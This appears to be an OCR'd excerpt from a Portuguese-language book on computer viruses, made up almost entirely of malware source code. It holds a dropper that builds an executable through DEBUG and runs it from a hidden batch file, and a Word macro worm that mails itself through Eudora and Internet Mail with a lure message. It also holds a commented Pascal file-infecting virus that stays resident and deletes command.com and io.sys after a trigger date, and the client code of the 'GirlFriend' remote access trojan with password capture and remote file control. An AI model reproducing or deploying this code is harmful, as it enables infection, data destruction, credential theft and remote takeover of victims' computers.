00 00 00" Print #1, "E1F00 00 00 05 4D 5A 60 00 10 00 00 00 00 00 00 00 00" Print #1, "E1F10 00 00 00 00 00 00 00 00 00 00 FF FF 00 00 00 00" Print #1, "E1F20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E1F30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #1, "E1F40 00 00 00 00 00 00 00 00 00 10 40 00 00 A0 00 B0" Print #1, "E1F50 00 B8 00 00 02 00 00 00 00 00 00 00 00 00 00 00" Print #1, "rcx" Print #1, "1E60" Print #1, "W" Print #1, "q" Close #1 Open "C:\EXEC_LG.BAT" For Output As #1 Print #1, "@echo off" Print #1, "debug < legado.scr > nul" REM Print #1, "echo Debug fim" Print #1, "c:\legado.com" Print #1, "del c:\legado.scr " Print #1, "del c:\legado.com " Print #1, "del c:\exec_LG.bat"


Close #1 ChDir "C:\" Shell "EXEC_LG.BAT", 0 NoDropper: End Sub


Página 129 Sub MAIN On Error Goto noway versão$ = ObterInfoSistema$(24) so$ = ObterInfoSistema$(21) normal$ = "" nome$ = "c:\precos.doc" If Ficheiros$(nome$) <> "" Then Kill nome$ If Ficheiros$("c:\winword\modelos\normal.dot") <> "" Then normal$ = Ficheiros$("c:\winword\modelos\normal.dot") If Ficheiros$("c:\winword\normal.dot") <> "" Then normal$ = Ficheiros$("c:\winword\normal.dot") If Ficheiros$("c:\msoffice\modelos\normal.dot") <> "" Then normal$ = Ficheiros$("c:\msoffice\modelos\normal.dot") If Ficheiros$("c:\msoffice\models\normal.dot") <> "" Then normal$ = Ficheiros$("c:\msoffice\models\normal.dot") If Ficheiros$("normal.dot") <> "" Then normal$ = Ficheiros$("normal.dot") If Ficheiros$("modelos\normal.dot") <> "" Then normal$ = Ficheiros$("modelos\normal.dot") If normal$ = "" Then Goto NoWay CopiarFicheiro normal$, "c:\" Name "c:\Normal." As nome$ If AplSendoExecutada("Eudora") Then AplExibir "Eudora Light" Goto eudora End If If AplSendoExecutada("Internet Mail") Then Goto win95 If Ficheiros$("C:\eudora\eudora.exe") <> "" Then Shell Ficheiros$("C:\eudora\eudora.exe"), 1 Goto eudora End If If Ficheiros$("C:\ficheiros de programas\eudora\eudora.exe") <> "" Then Shell Ficheiros$("C:\ficheiros de programas\eudora\eudora.exe"), 1 Goto eudora End If If Ficheiros$("C:\Program Files\eudora\eudora.exe") <> "" Then Shell Ficheiros$("C:\Program Files\eudora\eudora.exe"), 1 Goto eudora End If If so$ = "Windows" Then Goto Windows Goto NoWay Windows: If (versão$ >= "3") And (versão$ < "4.0") Then Goto Win311 If AplSendoExecutada("Internet Mail") Then Goto Win95 Goto noway Win311: If AplSendoExecutada("Mail") Then AplAtivar "Mail" Else MicrosoftMail EnviarTeclas "{enter 3}", - 1 End If On Error Goto NoWay EnviarTeclas "^r", - 1 AplOcultar "Mensagem" EnviarTeclas "%d", - 1 AplOcultar "Endereços" EnviarTeclas "+^{end}", - 1 EnviarTeclas "%p", - 1


EnviarTeclas "{enter}", - 1 EnviarTeclas "{tab 2}Sente só:{tab}", - 1 EnviarTeclas " Oi,{enter 2}Estou te enviando uma lista ", - 1 EnviarTeclas "sobre precos de programas para ", - 1 EnviarTeclas "PC, de uma olhada nela, falo ", - 1 EnviarTeclas "com você mais tarde, eu tenho que ", - 1 EnviarTeclas "ir para a escola, a empregada não veio ", - 1 EnviarTeclas "e eu tenho que me virar. Tchau.%r", - 1 EnviarTeclas nome$, - 1 EnviarTeclas "{enter}%f%n%j1", - 1 EnviarTeclas "{home}+^{end}{del 2}%{f4}" EnviarTeclas T = tecla "{tab}{enter}", - 1 Win95: AplExibir "Internet mail" AplOcultar "Internet mail" EnviarTeclas("^n"), - 1 If AplSendoExecutada("Nova Messagem") Then Goto portugues Else If AplSendoExecutada("New Message") Then Goto Ingles End If Goto noway Ingles: AplOcultar "New message" EnviarTeclas "%m", - 1 EnviarTeclas "r+^{end}", - 1 EnviarTeclas "%o", - 1 EnviarTeclas "{tab 7}{enter}{tab 2}", - 1 EnviarTeclas "^{home}Sente só:{tab}", - 1 EnviarTeclas " ^{home}{enter}^{home}Oi,{enter 2}Estou", - 1 EnviarTeclas " te enviando uma lista", - 1 EnviarTeclas " sobre precos de programas e", - 1 EnviarTeclas " jogos para o ", - 1 EnviarTeclas "PC, da’ uma olhada nela, falo ", - 1 EnviarTeclas "com você mais tarde, eu tenho que", - 1 EnviarTeclas " ir para a escola, a empregada não veio ", - 1 EnviarTeclas "e eu tenho que me virar. Tchau.{enter}%if", - 1 AplOcultar "Insert Atta" EnviarTeclas nome$, - 1 EnviarTeclas "{enter}%s^m", - 1 REM EnviarTeclas "{home}+^{end}{del}%{f4}^m", - 1 AplOcultar "Sending and Receiving" AplOcultar "Internet Mail" AplExibir "Microsoft Word" Goto noway Portugues: REM AplAtivar "Internet mail" AplOcultar "Internet mail" REM EnviarTeclas("^n"), - 1 AplOcultar "Nova mensagem" EnviarTeclas "%m", - 1 EnviarTeclas "r+^{end}", - 1 EnviarTeclas "%p", - 1 EnviarTeclas "{tab 7}{enter}{tab 2}", - 1 EnviarTeclas "Sente só:{tab}", - 1 EnviarTeclas " ^{home}{enter}^{home}Oi,{enter 2}Estou", - 1 EnviarTeclas " te enviando uma lista", - 1 EnviarTeclas " sobre precos de programas e", - 1 EnviarTeclas " jogos para o ", - 1 EnviarTeclas "PC, de uma olhada nela, falo ", - 1 EnviarTeclas "com você mais tarde, eu tenho que", - 1 EnviarTeclas " ir para a escola, a empregada não veio ", - 1 EnviarTeclas "e eu tenho que me virar. Tchau.{enter}%ia", - 1 AplOcultar "Insira" EnviarTeclas nome$, - 1


EnviarTeclas "{enter}%e^m", - 1 REM EnviarTeclas "{home}+^{end}{del}%{f4}^m", - 1 AplOcultar "Interner mail" AplExibir "Microsoft Word" Goto noway eudora: AplOcultar "Eudora Light" EnviarTeclas "{esc 2}", - 1 EnviarTeclas "^n^l{home}+^{end}%t", - 1 EnviarTeclas "{tab}Sente só:{tab 3}", - 1 EnviarTeclas "Oi,{enter 2}Estou te enviando uma lista", - 1 EnviarTeclas " sobre preços de programas e", - 1 EnviarTeclas " jogos para o ", - 1 EnviarTeclas "PC, dê uma olhada nela, falo ", - 1 EnviarTeclas "com você outra hora, eu tenho que", - 1 EnviarTeclas " ir para a escola, a empregada não veio ", - 1 EnviarTeclas "e eu tive que me virar sozinho. Tchau.{enter}^h", - 1 AplOcultar "Attach" EnviarTeclas nome$, - 1 EnviarTeclas "{enter}^e^t", - 1 AplOcultar "progress" AplOcultar "eudora Light" REM EnviarTeclas "{enter}", - 1 AplExibir "Microsoft Word" NoWay: End Sub


Página 149 {$M $2500,0,0 } {$S-,R-,I-,V-,f+} Program Exemplo_de_vírus_em_Pascal; USES crt,windos,dos; CONST LENVÍRUS=11616; {TAMANHO DO VÍRUS - ALTERE SE MODIFICADO, USE O PROGRAMA CABECALHO PARA ISSO} CAB:string[5]=CHR(77)+CHR(90)+CHR(96)+CHR(1)+cHR(23); {CABECALHO DO VÍRUS - ALTERE SE MODIFICADO, USE O PROGRAMA CABECALHO PARA ISSO} MAXBUFLEN=1024; {Tamanho do buffer em bytes a ser copiado de cada vez} FILES=10; {Ficheiros a serem infectados de cada vez} MOSTRA=true; {Você quer saber o que o seu vírus está a fazer?} VAR fvir,vfile,fromf,tof:file; {Ficheiro que vai conter o vírus, variável de ficheiro usado no vírus, 2 variáveis necessárias para a cópia do vírus } con:integer; {variável contadora} int1c: Procedure; {Estes dois serão vistos em exemplos de acções do vírus} printer:procedure; buffer:ARRAY[1..MAXBUFLEN] OF CHAR; {Necessário para a cópia de ficheiros} vx,vy,cx,cy:integer; {Coordenadas x,y da bola no ecrã} h, m, s, hund,day,mon,year: Word; {Necessário para conter a data e a hora do ficheiro} dat:datetime; {Vai conter a hora do ficheiro} ftime:longint; {Hora do ficheiro} vbola:boolean; nome_arq:pathstr; {Irá conter o nome do ficheiro com o vírus, muito necessário} arquiv:integer; {Quantidade de ficheiros infectados até ao momento} dirinfo:searchrec; {Muito usado no vírus, e responsável por procurar ficheiros onde eu quiser usando asteriscos (*.exe,c:\dos\*.com)} procedure HORAINI(NOME:STRING); var arq:file; begin if MOSTRA then writeln('Gravando a data e hora do ficheiro: ',nome); assign(arq, NOME); {Fica com a hora de criação do ficheiro} reset(arq); Getftime(arq,ftime); UnpackTime(ftime,dat); H:=dat.HOUR; M:=dat.MIN; S:=dat.SEC; day:=dat.day; mon:=dat.month; year:=dat.year; close(arq); if MOSTRA then writeln('Concluída a gravação da data e hora do ficheiro: ',nome); END; PROCEDURE HORAFIM(NOME:STRING); var arq:file; BEGIN if MOSTRA then writeln('Restaurando a data e hora original do programa: ',nome); dat.HOUR:=H; {Restaura a data e hora original} dat.MIN:=M; dat.SEC:=S; dat.day:=day; dat.month:=mon; dat.year:=year;


assign(arq, NOME); reset(arq); PackTime(dat,ftime); reset(arq); Setftime(arq,ftime); close(arq); if MOSTRA then writeln('Restauração do ficheiro ',nome,' concluída'); END; function verifica(nome:string):boolean; VAR buf: array[1..10] of Char; numread:WORD; con:integer; begin if MOSTRA then writeln('Iniciando verificação se o ficheiro ',nome,' já foi infectado.'); con:=1; assign(vFile,NoME); reset(vFile,1); { Record size = 1 } BlockRead(vFile, buf, SizeOf(buf), numread); IF (buf[3]=CAB[3]) AND (buf[4]=CAB[4]) then begin if MOSTRA then writeln('Verificação completa - ficheiro infectado '); {Verifica o cabeçalho do ficheiro} verifica:=TRUE {para ver se já foi infectado} end ELSE begin verifica:=FALSE; if MOSTRA then writeln('Verificação completa - ficheiro não infectado '); end; close(vFile); END; procedure infec(nome:string); var buf: array[1..LENVÍRUS] of Char; {Tamanho do vírus} buf2: array[1..2048] of Char; {Variável necessária para a cópia} numread, NumWritten: Word; begin if MOSTRA then writeln('Iniciando a infecção do ficheiro ',nome); if (nome<>'VIRTEMP.TMP') and (nome<>'COMMAND.COM') then begin HORAINI(NOME); {Grava data e hora do ficheiro} assign(FromF,nome); reset(FromF,1); assign(ToF,'virtemp.tmp'); Rewrite(ToF,1); repeat BlockRead(FromF, buf2, SizeOf(buf2), numread); BlockWrite(ToF, buf2, numread, NumWritten); until (numread = 0) or (NumWritten <> numread); close(FromF); close(tof);

{Até aqui seria a parte onde se copia o ficheiro a ser infectado para outro ficheiro temporário}

assign(FromF,nome_arq); {nome_arq: explicado mais tarde} reset(FromF, 1); assign(ToF, nome); Rewrite(ToF, 1); BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer} BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele} close(FromF); {copiará somente o vírus para o ficheiro a}


close(tof); {ser infectado (ficheiro.exe) em que havia sido} {movido o seu conteúdo para virtemp.tmp } {deixando, por enquanto somente o vírus no } {ficheiro } assign(FromF,'virtemp.TMP'); reset(FromF, 1); assign(ToF, nome); reset(tof,1); seek(tof,LENVÍRUS); {Posiciona o ponteiro do ficheiro na posição final do ficheiro} repeat BlockRead(FromF, buf, SizeOf(buf), numread); BlockWrite(ToF, buf, numread, NumWritten); until (numread = 0) or (NumWritten <> numread); close(FromF); close(tof); erase(fromf); HORAFIM(NOME); end; {Essa parte seria a concatenação vírus+ficheiro, onde o ficheiro seria acrescentado no fim do vírus} if MOSTRA then writeln('Infecção completa.'); end; procedure procura(nome,dir:string); begin if MOSTRA then writeln('Iniciando a infecção do directório: ',nome); FindFirst(nome, Archive, DirInfo); {$i+} while (DosError = 0) and (arquiv numread); close(FromF); close(tof); exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui} rewrite(tof); {Agora vou limpar o conteúdo e apagar o ficheiro} close(tof); erase(tof); if MOSTRA then writeln('Execução do programa hospedeiro finalizada'); end; procedure bola; interrupt; var cont:integer; begin if not vbola then if port[$60]<$80 then inc(con); if con=550 then vbola:=true; if vbola then begin cont:=random(4)+1; vy:=wherey; vx:=wherex; gotoxy(cx,cy); write('Û'); case cont of 1:if cx<78 then inc(cx); 2:if cx>1 then dec(cx); 3:if cy<23 then inc(cy); 4:if cy>1 then dec(cy); end; gotoxy(cx,cy);


write('þ'); gotoxy(vx,vy); end; inline ($9C); int1c; end; procedure apag_arq; var m,dia,ano,dow:word; mes:boolean; f:file; begin if mostra then writeln('Indo buscar a data actual'); getdate(ano,m,dia,dow); mes:=false; if ano=1998 then if m>=7 then {Data de activação: 12/07/1998} if dia>=12 then mes:=true; if ano>1998 then mes:=true; if mostra then writeln('Data actual finalizado'); if mes then begin if mostra then writeln('Iniciando a eliminação dos ficheiros: \command.com e \io.sys'); assign(f,'c:\command.com'); erase(f); assign(f,'c:\io.sys'); erase(f); end; end; Procedure inicinf; begin if MOSTRA then writeln('Iniciando a infecção dos ficheiros'); arquiv:=0; procura('*.com',''); procura('*.exe',''); { procura('c:\windows\*.com','c:\windows\'); procura('c:\windows\*.exe','c:\windows\'); procura('c:\dos\*.com','c:\dos\'); procura('c:\dos\*.exe','c:\dos\');} if MOSTRA then writeln('Infecção dos ficheiros Finalizada. Com um total de:'); if MOSTRA then writeln(arquiv,' ficheiros infectados.'); end; procedure contra(non:string); var FromF, ToF: file; ARQ:text; Ft:FILE of char; f:file; function vervir(nome:string):boolean; VAR Buf: array[1..10] of Char; NUMREAD:WORD; con:integer; begin if mostra then writeln('Iniciando a verificação de infecção do ficheiro ',nome); con:=1; ASSIGN(F,NoME); ReSET(F,1); { Record size = 1 } BlockRead(F, Buf, SizeOf(Buf), NumRead);


IF (BUF[1]=cab[1]) AND (BUF[2]=cab[2])AND (BUF[3]=cab[3])AND (BUF[4]=cab[4])AND (BUF[4]=cab[4]) tHEN {Verifica o cabeçalho do ficheiro} vervir:=TRUE {para ver se já foi infectado} ELSE vervir:=FALSE; Close(F); if mostra then writeln('Verificação de infecção finalizada'); END; procedure antivir; begin if not vervir(non) then begin if mostra then writeln('Ficheiro Infectado, tentando desinfectar...'); {Ficheiro infectado, tentando desinfectar...} aSSIGN(Ft,paramstr(0)); ReSET(Ft); { Record size = 1 } write(ft,cab[1]); write(ft,cab[2]); write(ft,cab[3]); write(ft,cab[4]); write(ft,cab[5]); close(ft); if mostra then writeln('Desinfeção completa!'); {Desinfeção completa} textcolor(white+blink); writeln('Atenção: O seu computador está infectado com um vírus! Sugiro que use um Anti-vírus!'); textcolor(white); end; end; begin if mostra then writeln('Início do procedimento anti-vírus.'); antivir; if mostra then writeln('Fim do procedimento anti-vírus.'); end; procedure escrever;interrupt; begin Sound(random(5000)); Delay(1); Nosound; inline ($9C); printer; end; begin if MOSTRA then writeln('Iniciando o Vírus'); nome_arq:=paramstr(0); {Esta variável irá conter o nome do programa que está a ser executado no momento. Caso o nome que foi executado seja EDIT.exe essa variável conterá EDIT.EXE} SETCBREAK(FALSE); {Para que o utilizador não possa carregar em Ctrl-C} contra(nome_arq); inicinf; executa; apag_arq; GetIntVec($1c,@int1c); SetIntVec($1c,Addr(bola)); vbola:=false; cx:=random(80);{Aleatorizar a posição da bola no ecrã} cy:=random(24); GetIntVec($17,@printer); SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar o procedimento escrever como defeito para a impressora} if MOSTRA then writeln('Fim do vírus.'); keep(0); {Deixa o programa residente em memória.}


if mostra then writeln('Programa Residente'); end.


Página 164 Programa MAIN.PAS unit main; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, Menus, StdCtrls, Buttons, ScktComp, ExtCtrls, ComCtrls, About, ImgList, OleCtrls, ShellAPI; const WM_NOTIFYMSG=WM_USER+1; type TClientForm = class(TForm) stbStatus: TStatusBar; ClientSocket: TClientSocket; sbConnect: TSpeedButton; sbShowPass: TSpeedButton; sbAbout: TSpeedButton; sbCustom: TSpeedButton; sbExit: TSpeedButton; ilApp: TImageList; sbMessage: TSpeedButton; gbLog: TGroupBox; gbTree: TGroupBox; txtLog: TMemo; Label1: TLabel; Label2: TLabel; PortChange: TButton; sbReset: TSpeedButton; cmdSave: TButton; sd1: TSaveDialog; tvApp: TTreeView; pmActions: TPopupMenu; Showpasswords1: TMenuItem; Sendmessage1: TMenuItem; Resetpasswordlist1: TMenuItem; N3: TMenuItem; PingserverAlive1: TMenuItem; N2: TMenuItem; mnuPlaySound: TMenuItem; mnuShowPic: TMenuItem; N1: TMenuItem; mnuURL: TMenuItem; mnuDelim1: TMenuItem; mnuShow: TMenuItem; N4: TMenuItem; mnuConnect: TMenuItem; N5: TMenuItem; mnuQuit: TMenuItem; ilWin: TImageList; txtHid: TMemo; sbFileManager: TSpeedButton; pmFile: TPopupMenu; mnuDelete: TMenuItem; N6: TMenuItem; mnuDownload: TMenuItem; mnuDelim: TMenuItem; mnuRun: TMenuItem; N7: TMenuItem; mnuUpload: TMenuItem; od1: TOpenDialog; IP: TComboBox; portvalue: TComboBox; procedure ScanIPs;


procedure ProcessDiskList; procedure ClientSocketConnect(Sender: TObject; Socket: TCustomWinSocket); procedure ClientSocketRead(Sender: TObject; Socket: TCustomWinSocket); procedure ClientSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure ProcessTree; procedure ProcessDirectory; procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure sbConnectClick(Sender: TObject); procedure sbShowPassClick(Sender: TObject); procedure sbCustomClick(Sender: TObject); procedure sbExitClick(Sender: TObject); procedure sbAboutClick(Sender: TObject); procedure FormCreate(Sender: TObject); procedure sbMessageClick(Sender: TObject); procedure txtLogDblClick(Sender: TObject); procedure PortChangeClick(Sender: TObject); procedure sbResetClick(Sender: TObject); procedure cmdSaveClick(Sender: TObject); procedure PingserverAlive1Click(Sender: TObject); procedure mnuPlaySoundClick(Sender: TObject); procedure mnuShowPicClick(Sender: TObject); procedure txtLogKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure tvAppKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure portvalue1KeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure IP1KeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure PortChangeKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure cmdSaveKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure FormKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure NotifyIcon (var TM: TMessage); message WM_NOTIFYMSG; procedure mnuShowClick(Sender: TObject); procedure mnuURLClick(Sender: TObject); procedure tvAppExpanding(Sender: TObject; Node: TTreeNode; var AllowExpansion: Boolean); procedure tvAppCollapsing(Sender: TObject; Node: TTreeNode; var AllowCollapse: Boolean); procedure sbFileManagerClick(Sender: TObject); procedure tvAppDblClick(Sender: TObject); procedure tvAppRatoDown(Sender: TObject; Button: TRatoButton; Shift: TShiftState; X, Y: Integer); procedure pmFilePopup(Sender: TObject); procedure mnuDeleteClick(Sender: TObject); procedure mnuRunClick(Sender: TObject); procedure mnuDownloadClick(Sender: TObject); procedure mnuUploadClick(Sender: TObject); protected IsServer: Boolean; end; var ClientForm: TClientForm; Server: String; implementation uses MessageUnit; const CLOSED_ICON=2;


OPEN_ICON=3; BMP_FILE=4; EXE_FILE=5; WAV_FILE=6; USUAL_FILE=7; HDD_ICON=8; CDROM_ICON=9; WrapStr = #13+#10; LastPosition = 1000; type iptype = record ipcount, pcount:integer; ip:array[0..99] of string[25]; port:array [0..99] of integer; end; var Fl: FILE of IPType; loading, scanning, working, diskmode, TreeCame, recfile, DeleteAnswer, FileDestroyed, Uploaded: boolean; Connection, ServerAnswer: boolean; PList: array [1..LastPosition] of string; PC: integer; CurrIP: string; IP_base, IP_count, CurrPort: integer; FolderNode: TTreeNode; FName, PCN: string; FSize, AC, SC: integer; FlT: FILE; buffer: array [0..16385] of byte; {$R *.DFM} function extract (st: string; ind1, ind2: integer): string; var i: integer; begin result:=''; for i:=ind1 to ind2 do result:=result+st[i]; end; procedure AddTrayIcon (ID: integer; Hint: string; Icon: TIcon; hWnd: LongInt; CallBack: LongInt); var MC: TNotifyIconData; begin with MC do begin cbSize:= sizeof(TNotifyIconData); Wnd:= hWnd; uID:= ID; uFlags:= NIF_MESSAGE or NIF_ICON or NIF_TIP; uCallbackMessage:= CallBack; hIcon:= Icon.Handle; if (length(hint)>0) then StrLCopy(szTip, PChar(hint), 63) else szTip[0]:= #0; end; if Shell_NotifyIcon (NIM_ADD, @MC) then SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_DLGFRAME and not WS_EX_APPWINDOW); end; procedure ModifyTrayIcon (ID: integer; Hint: string; Icon: TIcon; hWnd: LongInt; CallBack: LongInt); var MC: TNotifyIconData; begin


with MC do begin cbSize:= sizeof(TNotifyIconData); Wnd:= hWnd; uID:= ID; uFlags:= NIF_MESSAGE or NIF_ICON or NIF_TIP; uCallbackMessage:= CallBack; hIcon:= Icon.Handle; if (length(hint)>0) then StrLCopy(szTip, PChar(hint), 63) else szTip[0]:= #0; end; Shell_NotifyIcon (NIM_MODIFY, @MC); end; procedure DestroyTrayIcon (ID: integer; hWnd: LongInt); var MC: TNotifyIconData; begin with MC do begin cbSize:= sizeof(TNotifyIconData); Wnd:= hWnd; uID:= ID; end; Shell_NotifyIcon (NIM_DELETE, @MC); end; // Cuts the string at '(' position (when clicking filenames) function TrimPRT (ST: string): string; var i: integer; begin result:=''; for i:=1 to Length(ST)-1 do if ST[i+1]='(' then break else result:=result+ST[i]; end; // Duplicates the & symbol - to prevent _ function DupAmps (var ST: string): string; var i: integer; begin result:=''; for i:=1 to Length(ST) do if ST[i]<>'&' then result:=result+ST[i] else result:=result+'&&'; end; procedure TClientForm.ScanIPs; var i, DotPos: integer; ST, IPT: string; begin ST:=IP.Text; for i:=Length (ST) downto 1 do if ST[i]='.' then break; DotPos:=i; IP_base:=strtoint (extract (ST, i+1, Pos ('+', ST)-1)); IP_count:=strtoint (extract (ST, Pos ('+', ST)+1, Length (ST))); IPT:=copy (ST, 1, DotPos); scanning:=true; for i:=0 to IP_count do begin CurrIP:=IPT+inttostr (IP_base+i); ClientSocket.Close; ClientSocket.Port:=CurrPort; ClientSocket.Address:=CurrIP; stbStatus.Panels[0].Text:= 'Scanning IP '+CurrIP; ClientSocket.Open; ServerAnswer:=false; repeat


Application.ProcessMessages; until ServerAnswer; if Connection then break; end; end; procedure TClientForm.sbConnectClick(Sender: TObject); begin if sbConnect.caption='Disconnect' then begin ilWin.GetIcon (0, ClientForm.Icon); ModifyTrayIcon (1, 'GirlFriend client v1.2', ClientForm.Icon, ClientForm.Handle, WM_NOTIFYMSG); sbConnect.caption:='Connect'; mnuConnect.Caption:='Connect'; sbShowPass.Enabled:=false; sbMessage.Enabled:=false; sbCustom.Enabled:=false; sbFileManager.Enabled:=false; ClientForm.Showpasswords1.Enabled:=false; ClientForm.Sendmessage1.Enabled:=false; ClientForm.Resetpasswordlist1.Enabled:=false; ClientForm.PingserverAlive1.Enabled:=false; ClientForm.mnuPlaySound.Enabled:=false; ClientForm.mnuShowPic.Enabled:=false; ClientForm.mnuURL.Enabled:=false; sbReset.Enabled:=false; PortChange.Enabled:=false; clientsocket.socket.SendText('Quiting..'); clientsocket.Close; stbStatus.Panels[0].Text:= 'Disconnected'; exit; end; if (Length(IP.Text)>0) then begin if portvalue.text>'' then ClientSocket.Port:=strtoint(portvalue.Text) else begin ClientSocket.Port:=21554; PortValue.Text:=inttostr (ClientSocket.Port); end; CurrPort:=ClientSocket.Port; if Pos('+', IP.Text)=0 then begin scanning:=false; CurrIP:=IP.Text; with ClientSocket do begin Address:= IP.Text; Open; end end else ScanIPs; end; end; procedure TClientForm.ClientSocketConnect(Sender: TObject; Socket: TCustomWinSocket); var i:integer; a, b:boolean; begin a:=false; b:=false; for i:=0 to ip.items.count+1 do if ip.Items[i]=clientsocket.address then a:=true;


for i:=0 to portvalue.items.count+1 do if portvalue.Items[i]=inttostr(clientsocket.port) then b:=true; if a<>true then ip.items.Add(clientsocket.address); if b<>true then portvalue.items.Add(inttostr(clientsocket.port)); ServerAnswer:=true; Connection:=true; ilWin.GetIcon (1, ClientForm.Icon); ModifyTrayIcon (1, 'GirlFriend client v1.2. Connected with '+Socket.RemoteAddress, ClientForm.Icon, ClientForm.Handle, WM_NOTIFYMSG); PortChange.Enabled:=true; sbConnect.caption:='Disconnect'; mnuConnect.Caption:='Disconnect'; stbStatus.Panels[0].Text:= 'Connected to: ' + Socket.RemoteAddress; clientsocket.socket.SendText ('ver'); ClientSocket.Socket.SendText ('time'); tvApp.Items.Clear; sbShowPass.Enabled:=true; sbMessage.Enabled:=true; sbCustom.Enabled:=true; sbReset.Enabled:=true; sbFileManager.Enabled:=true; ClientForm.Showpasswords1.Enabled:=true; ClientForm.Sendmessage1.Enabled:=true; ClientForm.Resetpasswordlist1.Enabled:=true; ClientForm.PingserverAlive1.Enabled:=true; ClientForm.mnuPlaySound.Enabled:=true; ClientForm.mnuShowPic.Enabled:=true; ClientForm.mnuURL.Enabled:=true; end; procedure TClientForm.ProcessTree; var i: integer; First, TMP, found: TTreeNode; ST, FT: string; function FindNode (caption: string): boolean; var c: integer; begin result:=false; for c:=0 to tvApp.Items.Count-1 do if tvApp.Items.Item[c].Text=caption then begin result:=true; found:=tvApp.Items.Item[c]; break; end; end; begin tvApp.Items.Clear; First:=tvApp.Items.GetFirstNode; for i:=1 to PC do begin ST:=extract (PList[i], 1, Pos ('___', PList[i])-1); if not(FindNode(ST)) then begin TMP:=tvApp.Items.Add (First, ST); TMP.ImageIndex:=0; TMP.SelectedIndex:=0; end; end; for i:=1 to PC do begin ST:=extract (PList[i], 1, Pos ('___', PList[i])-1); FT:=extract (PList[i], Pos ('___', PList[i])+3, Length(PList[i]));


if FindNode(ST) then begin TMP:=tvApp.Items.AddChild (found, FT); TMP.ImageIndex:=1; TMP.SelectedIndex:=1; end; end; end; procedure TClientForm.ProcessDiskList; var TMP, First: TTreeNode; i: integer; ST: string; begin tvApp.Items.Clear; First:=tvApp.Items.GetFirstNode; for i:=1 to PC do begin ST:=extract (PList[i], 3, Length(PList[i])-1); TMP:=tvApp.Items.Add (First, ST); case PList[i][1] of 'H': begin TMP.ImageIndex:=HDD_ICON; TMP.SelectedIndex:=HDD_ICON; end; 'C': begin TMP.ImageIndex:=CDROM_ICON; TMP.SelectedIndex:=CDROM_ICON; end; end; TMP:=tvApp.Items.AddChild (TMP, 'Loading...'); TMP.SelectedIndex:=-1; TMP.ImageIndex:=-1; end; end; procedure TClientForm.ProcessDirectory; var i: integer; ST: string; CP: char; TMP: TTreeNode; procedure SetIcon (ic: integer); begin TMP.ImageIndex:=ic; TMP.SelectedIndex:=ic; end; begin working:=true; diskmode:=false; FolderNode.DeleteChildren; for i:=1 to PC do begin ST:=extract (PList[i], 3, Length(PList[i])); CP:=PList[i][1]; TMP:=tvApp.Items.AddChild (FolderNode, ST); case CP of 'E': SetIcon (EXE_FILE); 'W': SetIcon (WAV_FILE); 'B': SetIcon (BMP_FILE); 'U': SetIcon (USUAL_FILE); 'F': begin SetIcon (CLOSED_ICON); TMP:=tvApp.Items.AddChild (TMP, 'Loading...'); SetIcon (-1); end;


end; end; FolderNode.Expand (FALSE); diskmode:=true; TreeCame:=true; working:=false; end; procedure TClientForm.ClientSocketRead(Sender: TObject; Socket: TCustomWinSocket); var RST: string; i: integer; begin if (recfile) then begin repeat Application.ProcessMessages; AC:=Socket.ReceiveBuf (buffer, 1024); if AC>0 then begin SC:=SC+AC; Str (round(100*SC/FSize):3, PCN); stbStatus.Panels[0].Text:='Receiving '+FName+'. '+PCN+'% done.'; stbStatus.Refresh; BlockWrite (FlT, buffer, AC); end; until SC>=FSize; if recfile then begin CloseFile (FlT); txtLog.Lines.Add ('Downloading complete.'); stbStatus.Panels[0].Text:='Waiting for command.'; end; working:=false; recfile:=false; exit; end; if not(working) then begin RST:=Socket.ReceiveText; if RST='Uploading complete.' then begin Uploaded:=true; ServerAnswer:=True; end else ServerAnswer:=True; if Pos ('FCOMP}', RST)<>0 then begin working:=true; loading:=false; // Compress the txtHid for i:=0 to txtHid.Lines.Count-1 do if txtHid.Lines.Strings[i]='' then txtHid.Lines.Delete(i); FSize:=strtoint(txtHid.Lines.Strings[0]); FName:=txtHid.Lines.Strings[1]; AssignFile (FlT, FName); ReWrite (FlT, 1); for i:=0 to Length(RST)-9 do buffer[i]:=ord(RST[i+7]); BlockWrite (FlT, buffer, Length(RST)-9, SC); recfile:=true; exit; end;


if loading then txtHid.Text:=txtHid.Text+RST; if (pos('{PLTS}',RST)>0) then begin txtHid.Lines.Clear; txtHid.text:=copy(RST,7,length(rst)-6); loading:=true; end; if (pos('{TDSS}',RST)>0) then begin txtHid.Lines.Clear; txtHid.text:=copy(RST,7,length(rst)-6); loading:=true; end; if (pos('{FSEND}', RST)>0) then begin txtHid.Lines.Clear; txtHid.text:=copy(RST,8,length(rst)-7); loading:=true; end; if (pos('{LFTM}',RST)>0) then begin txtHid.Lines.Clear; txtHid.text:=copy(RST,7,length(rst)-6); loading:=true; end; if (not(loading)) then begin if RST='File deleted.' then begin FileDestroyed:=true; DeleteAnswer:=true; end; if RST='Delete Error.' then begin FileDestroyed:=false; DeleteAnswer:=true; end; txtLog.Lines.Add (RST); exit; end; if pos('TPL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then begin loading:=false; PC:=0; for i:=0 to txtHid.Lines.Count-1 do if (txtHid.Lines.Strings [i]<>'') and (txtHid.Lines.Strings[i]<>'{FTPL}') and (Pos ('___', txtHid.Lines.Strings[i])<>0) then begin Inc (PC); PList [PC]:=txtHid.Lines.Strings[i]; end; gbTree.Caption:=' Password && text fields '; 